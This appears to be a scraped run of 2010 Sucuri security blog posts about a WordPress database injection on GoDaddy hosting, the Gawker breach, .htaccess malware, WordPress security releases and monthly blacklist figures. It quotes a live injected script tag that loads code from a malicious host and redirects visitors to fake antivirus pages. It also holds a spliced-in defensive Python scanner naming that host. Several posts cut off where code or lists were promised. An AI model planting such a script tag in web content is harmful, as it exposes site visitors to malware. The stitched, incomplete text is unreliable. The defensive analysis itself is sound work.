Attacks against GoDaddy – acrossuniverseitbenet + Hilary Kneber + HardSoft

For the last few days we’ve been tracking another large-scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.

This time the attackers changed tactics: instead of infecting the PHP files, they injected malicious code into the database. On the infected WordPress sites they added the following JavaScript inside every post (in the wp_posts table):

<script src= "http://acrossuniverseitbenet.com/js.php?kk=10"></script>

As you can imagine, this script redirects the user to the infamous “Fake AV” pages:
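As an added example (not code from the original post or from Sucuri), here is a small Python scanner that finds and strips that injected tag from wp_posts rows. The sample rows are constructed, and the tag regex and the known-bad host set are assumptions seeded from the single domain quoted above.

```python
import re
from urllib.parse import urlparse

# Host quoted in the post as the source of the injected script (assumption: an
# operator extends this set with whatever their own scan turns up).
KNOWN_BAD_HOSTS = {"acrossuniverseitbenet.com"}

# Loose match for <script src="..."></script>: the injected tag had a space after
# the "=" and odd quoting, so whitespace, quote style and case are tolerated.
SCRIPT_TAG = re.compile(
    r'''<script\s+src\s*=\s*["']?\s*(https?://[^"'\s>]+)["']?\s*>\s*</script\s*>''',
    re.IGNORECASE,
)

def _is_bad(src, bad_hosts):
    host = (urlparse(src).hostname or "").lower()
    return host in bad_hosts

def find_injected_scripts(post_content, bad_hosts=KNOWN_BAD_HOSTS):
    """Return the src URLs of script tags in one post that point at a bad host."""
    return [m.group(1) for m in SCRIPT_TAG.finditer(post_content)
            if _is_bad(m.group(1), bad_hosts)]

def strip_injected_scripts(post_content, bad_hosts=KNOWN_BAD_HOSTS):
    """Remove only script tags pointing at a bad host; leave legitimate ones alone."""
    return SCRIPT_TAG.sub(
        lambda m: "" if _is_bad(m.group(1), bad_hosts) else m.group(0),
        post_content,
    )

def scan_posts(rows, bad_hosts=KNOWN_BAD_HOSTS):
    """rows: iterable of (ID, post_content), as SELECTed from wp_posts.
    Returns {ID: [injected src, ...]} for every infected post."""
    report = {}
    for post_id, content in rows:
        hits = find_injected_scripts(content, bad_hosts)
        if hits:
            report[post_id] = hits
    return report

# Constructed sample rows standing in for wp_posts (ID, post_content).
SAMPLE_POSTS = [
    (1, 'Hello world<script src= "http://acrossuniverseitbenet.com/js.php?kk=10"></script>'),
    (2, 'Clean post using <script src="https://example.com/app.js"></script>'),
    (3, '<p>Intro</p><SCRIPT SRC="http://acrossuniverseitbenet.com/js.php?kk=10"></SCRIPT><p>More</p>'),
]

if __name__ == "__main__":
    for post_id, srcs in scan_posts(SAMPLE_POSTS).items():
        print(f"post {post_id}: {srcs}")
```

Run the same scan over real rows before writing anything back, since a blind UPDATE ... REPLACE() on wp_posts also removes legitimate script tags that happen to match.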

Weekly malware update – 2010/Dec/17

Starting this week, we’re going to post a weekly malware update about the issues (always malware-related) that arise throughout the week.

This is the first one; you can follow them through our malware_updates category.

* If your site has been affected by any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help, or if you want to share some information with us.


Analysis of the Gawker compromise

As most of you probably know, Gawker Media’s servers were compromised, resulting in a security breach at Lifehacker, Gizmodo, Gawker, Jezebel, io9, Jalopnik, Kotaku, Deadspin, and Fleshbot. This means that if you’ve ever had an account on any of those sites, it was compromised.

It also means that if you re-use your passwords, your accounts at other sites could be compromised as well (including Gmail, Twitter, Hotmail, etc.).

So, if you have an account on any of those sites, make sure to change your passwords ASAP! Not only at those Gawker sites, but everywhere you used the same password!

Analysis of the attack

We don’t know exactly how they got access to the site, but the attackers were “kind” enough to post a readme and tell their side of the story. You can read it here: http://sucuri.net/mirror/gawker-readme.txt

It seems it all started with one account getting stolen, followed by the same password being re-used on other resources (email, Basecamp, etc.), followed by critical information found in emails, followed by a mass compromise. You get the picture!

It teaches us a few lessons:

  1. Do not re-use your passwords.
  2. Access control: Restrict access to some resources by IP address.
  3. The importance of log analysis – if they had been looking at their logs, they would have detected the compromise a lot earlier.


Malware update: publifacil.org – htaccess changes and PE*.php

Over the last few days we’ve been tracking a large number of sites infected with a very interesting piece of malware.

All the sites hacked so far contain the following in their .htaccess file (PEcasas.php can be any of many names, such as PEtherm.php, PEmerle.php, PEirade.php, PEdropt.php, PErodeo.php, etc.):

Those PE*.php files have a very long piece of code:

WordPress 3.0.3 released (security update)

Running WordPress? Time to update it again! Version 3.0.3 has been released, fixing some security vulnerabilities. If you can’t upgrade, make sure remote publishing is disabled by checking the “Settings → Writing” page.

Details: http://wordpress.org/news/2010/12/wordpress-3-0-3/

This release fixes issues in the remote publishing interface, which under certain circumstances allowed Author- and Contributor-level users to improperly edit, publish, or delete posts.

These issues only affect sites that have remote publishing enabled.

Remote publishing is disabled by default, but you may have enabled it to use a remote publishing client such as one of the WordPress mobile apps. You can check these settings on the “Settings → Writing” screen.


WordPress 0 day exploit (version 3.0.1 and older)

We posted last week about the release of WordPress 3.0.2 that fixes a few security vulnerabilities.

Today, full details of the vulnerability and exploit code have been released. So if you haven’t upgraded yet, make sure to do so now (especially if your site has multiple authors).

“The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that comes from the user, allowing a remote user with publish_posts and edit_published_posts capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any information stored in the WordPress database.”

Details here: http://www.vul.kr/wordpress-all-version-0day-exploit


Interested in WordPress security monitoring? Visit http://sucuri.net.

Alexa top sites – Blacklist for November

Every month we analyze Alexa’s TOP 1 million site ranking and correlate that data with Google’s blacklist. Our goal is to get an overall view of the sites that are getting hacked, blacklisted, etc.

For Nov-2010 the number is pretty standard, but a little below previous months. Out of those top 1 million sites, around 2.2 thousand got their main domain blacklisted (2,252 to be more exact), against 3 thousand in October. Out of the top 100k, more than 248 got blacklisted by Google.

Over time, only 636 sites that were blacklisted in previous months are still blacklisted and in the TOP 1 million ranking.

These are the top 100 sites that got flagged and their respective rankings (you can get the full list here):

Out of the non-malicious blacklisted sites (the ones that got hacked and fixed), more than 14% were using WordPress and 13% were using osCommerce (heavily attacked this month). A lot of “.co.cc” sites were well ranked (and blacklisted), but all of them were malicious in nature (phishing).

For our Canadian friends, rogersplus.ca (from Rogers, one of the biggest cable/TV/phone companies in Canada), got blacklisted as well.

We will post more details in future posts. If you have any questions or comments about it, let us know.